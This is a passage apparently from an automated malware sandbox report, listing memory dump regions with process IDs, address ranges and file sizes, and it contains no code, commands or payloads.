                                                                • memory/2400-167-0x0000000000000000-mapping.dmp
                                                                • memory/2424-202-0x0000000000000000-mapping.dmp
                                                                • memory/2460-206-0x0000000000000000-mapping.dmp
                                                                • memory/2480-146-0x0000000000000000-mapping.dmp
                                                                • memory/2544-144-0x0000000000000000-mapping.dmp
                                                                • memory/2624-160-0x0000000000000000-mapping.dmp
                                                                • memory/2752-162-0x0000000000000000-mapping.dmp
                                                                • memory/2800-163-0x0000000000000000-mapping.dmp
                                                                • memory/3068-185-0x0000000000000000-mapping.dmp
                                                                • memory/3152-171-0x0000000000000000-mapping.dmp
                                                                • memory/3164-139-0x0000000000000000-mapping.dmp
                                                                • memory/3388-159-0x0000000000000000-mapping.dmp
                                                                • memory/3424-187-0x0000000000000000-mapping.dmp
                                                                • memory/3504-148-0x0000000000000000-mapping.dmp
                                                                • memory/3536-186-0x0000000000000000-mapping.dmp
                                                                • memory/3544-217-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/3544-215-0x000001FE361C0000-0x000001FE361C7000-memory.dmp
                                                                  Filesize

                                                                  28KB

                                                                • memory/3556-141-0x0000000000000000-mapping.dmp
                                                                • memory/3632-166-0x0000000000000000-mapping.dmp
                                                                • memory/3712-188-0x0000000000000000-mapping.dmp
                                                                • memory/3824-131-0x0000000000000000-mapping.dmp
                                                                • memory/4016-173-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4016-201-0x000000001B5C0000-0x000000001B5D2000-memory.dmp
                                                                  Filesize

                                                                  72KB

                                                                • memory/4052-207-0x0000000000000000-mapping.dmp
                                                                • memory/4248-200-0x0000000000000000-mapping.dmp
                                                                • memory/4264-205-0x0000000000000000-mapping.dmp
                                                                • memory/4300-154-0x0000000000000000-mapping.dmp
                                                                • memory/4380-150-0x0000000000000000-mapping.dmp
                                                                • memory/4392-140-0x0000000000000000-mapping.dmp
                                                                • memory/4400-211-0x0000000000000000-mapping.dmp
                                                                • memory/4456-199-0x0000000000000000-mapping.dmp
                                                                • memory/4472-204-0x0000000000000000-mapping.dmp
                                                                • memory/4496-136-0x0000000000000000-mapping.dmp
                                                                • memory/4520-203-0x0000000000000000-mapping.dmp
                                                                • memory/4560-135-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4560-133-0x000001AA83F50000-0x000001AA83F72000-memory.dmp
                                                                  Filesize

                                                                  136KB

                                                                • memory/4560-132-0x0000000000000000-mapping.dmp
                                                                • memory/4576-145-0x0000000000000000-mapping.dmp
                                                                • memory/4596-198-0x0000000000000000-mapping.dmp
                                                                • memory/4628-155-0x0000000000000000-mapping.dmp
                                                                • memory/4700-194-0x0000000000000000-mapping.dmp
                                                                • memory/4812-134-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4812-130-0x0000000000BE0000-0x0000000000E66000-memory.dmp
                                                                  Filesize

                                                                  2.5MB

                                                                • memory/4820-197-0x0000000000000000-mapping.dmp
                                                                • memory/4912-149-0x0000000000000000-mapping.dmp
                                                                • memory/4952-183-0x0000000000000000-mapping.dmp
                                                                • memory/5064-210-0x0000000000000000-mapping.dmp
                                                                • memory/5116-153-0x0000000000000000-mapping.dmp